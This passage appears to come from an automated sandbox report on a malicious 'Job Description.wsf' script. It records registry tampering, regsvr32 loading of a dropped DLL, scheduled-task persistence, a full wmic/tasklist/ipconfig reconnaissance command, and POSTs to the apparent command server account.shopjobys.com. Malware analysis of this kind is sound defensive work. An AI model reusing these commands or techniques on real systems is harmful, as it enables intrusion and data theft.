"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS"; Key: "") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Accesses System Certificates Settings
- details
-
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\2E4916B07F3DE90C8DDE2566FD9B9B400D89BBBA"; Key: "BLOB")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\5AEAEE3F7F2A9449CEBAFEEC68FDD184F20124A7"; Key: "BLOB")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\E6A3B45B062D509B3382282D196EFE97D5956CCB"; Key: "BLOB")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\F5AD0BCC1AD56CD150725B1C866C30AD92EF21B0"; Key: "BLOB")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\109F1CAED645BB78B3EA2B94C0697C740733031C"; Key: "BLOB")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\D559A586669B08F46A30A133F8A9ED3D038E2EA8"; Key: "BLOB")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\FEE449EE0E3965A5246F000E87FDE2A065FD89D4"; Key: "BLOB")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Contacts domains
- details
-
"crt.sectigo.com"
"account.shopjobys.com" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"18.222.173.108:443"
"91.199.212.52:80" - source
- Network Traffic
- relevance
- 1/10
-
Creates a writable file in a temporary directory
- details
-
"wscript.exe" created file "%TEMP%\Cab4EC3.tmp"
"wscript.exe" created file "%TEMP%\Tar4EC4.tmp"
"WINWORD.EXE" created file "%TEMP%\~DFAB94EE5F1CB19B40.TMP"
"cmd.exe" created file "%TEMP%\55356.txt"
"cmd.exe" created file "%TEMP%\8785.txt"
"cmd.exe" created file "%TEMP%\23030.txt"
"cmd.exe" created file "%TEMP%\4254.txt"
"cmd.exe" created file "%TEMP%\24760.txt"
"cmd.exe" created file "%TEMP%\1931.txt"
"cmd.exe" created file "%TEMP%\16406.txt" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"Local\ZonesCacheCounterMutex"
"Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\_MSIExecute"
"Local\10MU_ACBPIDS_S-1-5-5-0-64883"
"Global\MTX_MSO_AdHoc1_S-1-5-21-2092356043-4041700817-663127204-1001"
"Local\10MU_ACB10_S-1-5-5-0-64883"
"Global\MTX_MSO_Formal1_S-1-5-21-2092356043-4041700817-663127204-1001"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-64883"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-64883"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-2092356043-4041700817-663127204-1001"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-2092356043-4041700817-663127204-1001" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "~_21152.doc" as clean (type is "data")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6AF50000
- source
- Loaded Module
- ATT&CK ID
- T1179
-
Logged script engine calls
- details
-
"wscript.exe" called "WScript.Shell.1.CreateObject" ...
"wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
"msxsl.exe" called "WScript.Shell.1.CreateObject" ...
"msxsl.exe" called "WScript.Network.1.CreateObject" ...
"msxsl.exe" called "Msxml2.XMLHTTP.6.0.CreateObject" ...
"msxsl.exe" called "Msxml2.ServerXMLHTTP.6.0.CreateObject" ...
"msxsl.exe" called "Shell.Application.1.CreateObject" ... - source
- API Call
- relevance
- 10/10
-
Overview of unique CLSIDs touched in registry
- details
-
"WINWORD.EXE" touched "Microsoft Word 97-2003-Dokument" (Path: "HKCU\CLSID\{00020906-0000-0000-C000-000000000046}\IMPLEMENTED CATEGORIES\{00021490-0000-0000-C000-000000000046}")
"WINWORD.EXE" touched "Shortcut" (Path: "HKCU\CLSID\{00021401-0000-0000-C000-000000000046}")
"WINWORD.EXE" touched "Computer" (Path: "HKCU\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\SHELLFOLDER")
"WINWORD.EXE" touched "Memory Mapped Cache Mgr" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}")
"WINWORD.EXE" touched "SAX XML Reader 6.0" (Path: "HKCU\CLSID\{88D96A0C-F192-11D4-A65F-0040963251E5}\TREATAS")
"WINWORD.EXE" touched "MXXMLWriter 6.0" (Path: "HKCU\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\TREATAS")
"WINWORD.EXE" touched "OneNote Word Add-In Take Notes Content Service Class" (Path: "HKCU\CLSID\{C580A1B2-5915-4DC3-BE93-8A51F4CAB320}\INPROCSERVER32")
"WINWORD.EXE" touched "PersistentZoneIdentifier" (Path: "HKCU\CLSID\{0968E258-16C7-4DBA-AA86-462DD61E31A3}\TREATAS")
"WINWORD.EXE" touched "Security Manager" (Path: "HKCU\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\TREATAS")
"WINWORD.EXE" touched "Factoid Class" (Path: "HKCU\CLSID\{16A933D2-A296-49D5-96FC-C7C2DAEE88B4}\INPROCSERVER32")
"WINWORD.EXE" touched "MetAction Class" (Path: "HKCU\CLSID\{3CC385AC-95CC-4A75-BF35-AB36AE645BCF}\INPROCSERVER32")
"WINWORD.EXE" touched "IMContactRecognizer Class" (Path: "HKCU\CLSID\{579A3C71-2339-4DEE-A735-24BF2D1C5814}\INPROCSERVER32")
"WINWORD.EXE" touched "VSTO SmartTag Action" (Path: "HKCU\CLSID\{99E0D1EC-0A0D-4E50-B8A1-82A8B6ECE5CB}\INPROCSERVER32")
"WINWORD.EXE" touched "SmartDocument Class" (Path: "HKCU\CLSID\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}\INPROCSERVER32")
"WINWORD.EXE" touched "Microsoft Word-Vorlage mit Makros" (Path: "HKCU\CLSID\{8A624388-AA27-43E0-89F8-2A12BFF7BCCD}\IMPLEMENTED CATEGORIES\{00021490-0000-0000-C000-000000000046}")
"WINWORD.EXE" touched "MetRecog Class" (Path: "HKCU\CLSID\{32D85DA2-070B-49A0-9261-E7854457A6D6}\INPROCSERVER32")
"WINWORD.EXE" touched "XML DOM Document 6.0" (Path: "HKCU\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\TREATAS")
"schtasks.exe" touched "TaskScheduler class" (Path: "HKCU\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}")
"msxsl.exe" touched "NetworkListManager" (Path: "HKCU\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}")
"msxsl.exe" touched "Network List Manager" (Path: "HKCU\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}") - source
- Registry Access
- relevance
- 3/10
-
Process launched with changed environment
- details
-
Process "WINWORD.EXE" was launched with modified environment variables: "Path"
Process "regsvr32.exe" was launched with modified environment variables: "Path"
Process "WMIC.exe" was launched with new environment variables: "PROMPT="$P$G"" - source
- Monitored Target
- relevance
- 10/10
-
Reads configuration files
- details
- "msxsl.exe" read file "%USERPROFILE%\Desktop\desktop.ini"
- source
- API Call
- relevance
- 4/10
-
Runs shell commands
- details
-
"/c del "%APPDATA%\Microsoft\40070.ocx" >> NUL" on 2019-12-19.22:28:58.363
"/c wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textvaluelist | findstr /R /C:"SerialNumber=" > "%TEMP%\55356.txt" & vol C: > "%TEMP%\8785.txt" & wmic csproduct get Name /FORMAT:Textvaluelist | findstr /R /C:"Name=" > "%TEMP%\23030.txt" & tasklist /FO CSV /NH > "%TEMP%\4254.txt" & ver > "%TEMP%\24760.txt" & wmic os get ProductType /FORMAT:Textvaluelist | findstr /R /C:"ProductType=" > "%TEMP%\1931.txt" & ipconfig | findstr /R /C:"IPv4 Address" > "%TEMP%\16406.txt"" on 2019-12-19.22:30:24.566 - source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1010
-
Spawns new processes
- details
-
Spawned process "WINWORD.EXE" with commandline ""%APPDATA%\Microsoft\21152.doc""
Spawned process "regsvr32.exe" with commandline "/s /i "%APPDATA%\Microsoft\40070.ocx""
Spawned process "schtasks.exe" with commandline "/Delete /F /TN "912F8A0F793""
Spawned process "schtasks.exe" with commandline "/Create /TN "912F8A0F793" /XML "%ALLUSERSPROFILE%\Microsoft\1B2F ..."
Spawned process "msxsl.exe" with commandline "8CDAF1CED822.txt 8CDAF1CED822.txt"
Spawned process "cmd.exe" with commandline "/c del "%APPDATA%\Microsoft\40070.ocx" >> NUL"
Spawned process "cmd.exe" with commandline "/c wmic path win32_Operatingsystem get SerialNumber /FORMAT:Text ..."
Spawned process "WMIC.exe" with commandline "wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textva ..."
Spawned process "findstr.exe" with commandline "findstr /R /C:"SerialNumber=""
Spawned process "WMIC.exe" with commandline "wmic csproduct get Name /FORMAT:Textvaluelist"
Spawned process "findstr.exe" with commandline "findstr /R /C:"Name=""
Spawned process "tasklist.exe" with commandline "tasklist /FO CSV /NH"
Spawned process "WMIC.exe" with commandline "wmic os get ProductType /FORMAT:Textvaluelist"
Spawned process "findstr.exe" with commandline "findstr /R /C:"ProductType=""
Spawned process "ipconfig.exe"
Spawned process "findstr.exe" with commandline "findstr /R /C:"IPv4 Address"" - source
- Monitored Target
- relevance
- 3/10
-
Spawns new processes that are not known child processes
- details
-
Spawned process "WINWORD.EXE" with commandline ""%APPDATA%\Microsoft\21152.doc""
Spawned process "regsvr32.exe" with commandline "/s /i "%APPDATA%\Microsoft\40070.ocx""
Spawned process "schtasks.exe" with commandline "/Delete /F /TN "912F8A0F793""
Spawned process "schtasks.exe" with commandline "/Create /TN "912F8A0F793" /XML "%ALLUSERSPROFILE%\Microsoft\1B2F ..."
Spawned process "msxsl.exe" with commandline "8CDAF1CED822.txt 8CDAF1CED822.txt"
Spawned process "cmd.exe" with commandline "/c del "%APPDATA%\Microsoft\40070.ocx" >> NUL"
Spawned process "cmd.exe" with commandline "/c wmic path win32_Operatingsystem get SerialNumber /FORMAT:Text ..."
Spawned process "WMIC.exe" with commandline "wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textva ..."
Spawned process "findstr.exe" with commandline "findstr /R /C:"SerialNumber=""
Spawned process "WMIC.exe" with commandline "wmic csproduct get Name /FORMAT:Textvaluelist"
Spawned process "findstr.exe" with commandline "findstr /R /C:"Name=""
Spawned process "tasklist.exe" with commandline "tasklist /FO CSV /NH"
Spawned process "WMIC.exe" with commandline "wmic os get ProductType /FORMAT:Textvaluelist"
Spawned process "findstr.exe" with commandline "findstr /R /C:"ProductType=""
Spawned process "ipconfig.exe"
Spawned process "findstr.exe" with commandline "findstr /R /C:"IPv4 Address"" - source
- Monitored Target
- relevance
- 3/10
-
Installation/Persistence
-
Connects to LPC ports
- details
-
"WINWORD.EXE" connecting to "\ThemeApiPort"
"regsvr32.exe" connecting to "\ThemeApiPort"
"schtasks.exe" connecting to "\ThemeApiPort"
"msxsl.exe" connecting to "\ThemeApiPort"
"WMIC.exe" connecting to "\ThemeApiPort" - source
- API Call
- relevance
- 1/10
-
Creates new processes
- details
-
"wscript.exe" is creating a new process (Name: "%WINDIR%\System32\svchost.exe", Handle: 1320)
"wscript.exe" is creating a new process (Name: "C:\Windows\System32\regsvr32.exe", Handle: 1328)
"regsvr32.exe" is creating a new process (Name: "C:\Windows\System32\schtasks.exe", Handle: 288)
"regsvr32.exe" is creating a new process (Name: "C:\Windows\System32\schtasks.exe", Handle: 292)
"regsvr32.exe" is creating a new process (Name: "%ALLUSERSPROFILE%\Microsoft\msxsl.exe", Handle: 288)
"regsvr32.exe" is creating a new process (Name: "C:\Windows\System32\cmd.exe", Handle: 292)
"msxsl.exe" is creating a new process (Name: "%WINDIR%\System32\VBoxTray.exe", Handle: 1508)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\wbem\WMIC.exe", Handle: 92)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\wbem\WMIC.exe", Handle: 80)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\findstr.exe", Handle: 100)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\findstr.exe", Handle: 108)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\findstr.exe", Handle: 84)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\tasklist.exe", Handle: 88)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\findstr.exe", Handle: 116)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\ipconfig.exe", Handle: 108) - source
- API Call
- relevance
- 8/10
-
Dropped files
- details
-
"21152.doc" has type "Composite Document File V2 Document Little Endian Os: Windows Version 6.1 Code page: 1252 Title: Internal Job Application Form Author: gwen rogers Template: Normal Last Saved By: Pam Byrd Revision Number: 2 Name of Creating Application: Microsoft Office Word Last Printed: Fri Feb 24 18:58:00 2012 Create Time/Date: Tue Nov 3 20:35:00 2015 Last Saved Time/Date: Tue Nov 3 20:35:00 2015 Number of Pages: 1 Number of Words: 305 Number of Characters: 1744 Security: 0"
"21152.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu Dec 19 21:18:39 2019 mtime=Thu Dec 19 21:18:39 2019 atime=Thu Dec 19 21:18:39 2019 length=65536 window=hide"
"~_21152.doc" has type "data"
"~WRS_8B17FE91-C013-4377-BC8D-FDE8AB008397_.tmp" has type "data"
"77EC63BDA74BD0D0E0426DC8F8008506" has type "data"
"index.dat" has type "data"
"Tar4EC4.tmp" has type "data"
"5BBDA94EA59A54780CD5101BF0AF1837_75B55D50AC5471AEF49255E8D11DE15B" has type "data"
"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 6894 bytes 1 file"
"4254.txt" has type "ASCII text with CRLF line terminators"
"24760.txt" has type "ASCII text with CRLF line terminators"
"Cab4EC3.tmp" has type "Microsoft Cabinet archive data 58806 bytes 1 file"
"07CEF2F654E3ED6050FFC9B6EB844250_426BFAC057FA3BC8F7120A426363018F" has type "data"
"55356.txt" has type "ASCII text with CRLF CR line terminators"
"40070.ocx" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"8785.txt" has type "ASCII text with CRLF line terminators"
"16406.txt" has type "ASCII text with CRLF line terminators"
"23030.txt" has type "ASCII text with CRLF CR line terminators"
"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 58806 bytes 1 file" - source
- Binary File
- relevance
- 3/10
-
Drops executable files
- details
- "40070.ocx" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "C:\Windows\System32\rsaenh.dll"
"wscript.exe" touched file "C:\Windows\System32\en-US\wscript.exe.mui"
"wscript.exe" touched file "C:\Windows\System32\wscript.exe"
"wscript.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"wscript.exe" touched file "C:\Windows\System32\en-US\winhttp.dll.mui"
"wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"wscript.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"wscript.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000020.db"
"wscript.exe" touched file "C:\Windows\System32\en-US\jscript.dll.mui"
"wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
"wscript.exe" touched file "C:\Windows\System32\tzres.dll"
"wscript.exe" touched file "C:\Windows\AppPatch\sysmain.sdb"
"wscript.exe" touched file "C:\Windows\System32"
"wscript.exe" touched file "C:\Windows\System32\regsvr32.exe"
"wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches" - source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential IP address in binary/memory
- details
-
Heuristic match: "IPv4 Address. . . . . . . . . . . : 192.168.240.18"
Heuristic match: "Subnet Mask . . . . . . . . . . . : 255.255.255.0"
Heuristic match: "Default Gateway . . . . . . . . . : 192.168.240.1" - source
- File/Memory
- relevance
- 3/10
-
Found potential URL in binary/memory
- details
-
Heuristic match: "crt.sectigo.com"
Heuristic match: "GET /SectigoRSADomainValidationSecureServerCA.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crt.sectigo.com"
Heuristic match: "account.shopjobys.com"
Heuristic match: "POST /av4598yh001/info HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 36
Host: account.shopjobys.com"
Heuristic match: "POST /av4598yh001/info HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 146
Host: account.shopjobys.com"
Heuristic match: "POST /av4598yh001/info HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 153
Host: account.shopjobys.com"
Heuristic match: "POST /av4598yh001/info HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 144
Host: account.shopjobys.com"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://www.w3.org/1999/XSL/Transform"
Pattern match: "http://schemas.microsoft.com/windows/2004/02/mit/task"
Pattern match: "http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt" - source
- File/Memory
- relevance
- 10/10
-
Remote Access Related
-
Contains references to WMI/WMIC
- details
-
""WmiPrvSE.exe","2704","Services","0","4
956 K"" (Indicator: "wmiprvse.exe")
""WmiPrvSE.exe","3220","Services","0","9
972 K"" (Indicator: "wmiprvse.exe")
"WMIC.exe" (Indicator: "wmic.exe")
"WmiPrvSE.exe" (Indicator: "wmiprvse.exe") - source
- File/Memory
- relevance
- 10/10
- ATT&CK ID
- T1047
-
Reads terminal service related keys (often RDP related)
- details
- "msxsl.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\TERMINAL SERVER"; Key: "TSUSERENABLED")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1076
-
System Security
-
Creates or modifies windows services
- details
- "msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Modifies Software Policy Settings
- details
-
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Modifies proxy settings
- details
-
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"msxsl.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"msxsl.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"msxsl.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"msxsl.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"msxsl.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
- details
-
"WINWORD.EXE" opened "\Device\KsecDD"
"regsvr32.exe" opened "\Device\KsecDD"
"schtasks.exe" opened "\Device\KsecDD"
"msxsl.exe" opened "\Device\KsecDD"
"WMIC.exe" opened "\Device\KsecDD"
"tasklist.exe" opened "\Device\KsecDD" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1215
-
Unusual Characteristics
-
Drops cabinet archive files
- details
-
"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 6894 bytes 1 file"
"Cab4EC3.tmp" has type "Microsoft Cabinet archive data 58806 bytes 1 file"
"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 58806 bytes 1 file" - source
- Binary File
- relevance
- 10/10
File Details
Job Description.wsf
- Filename
- Job Description.wsf
- Size
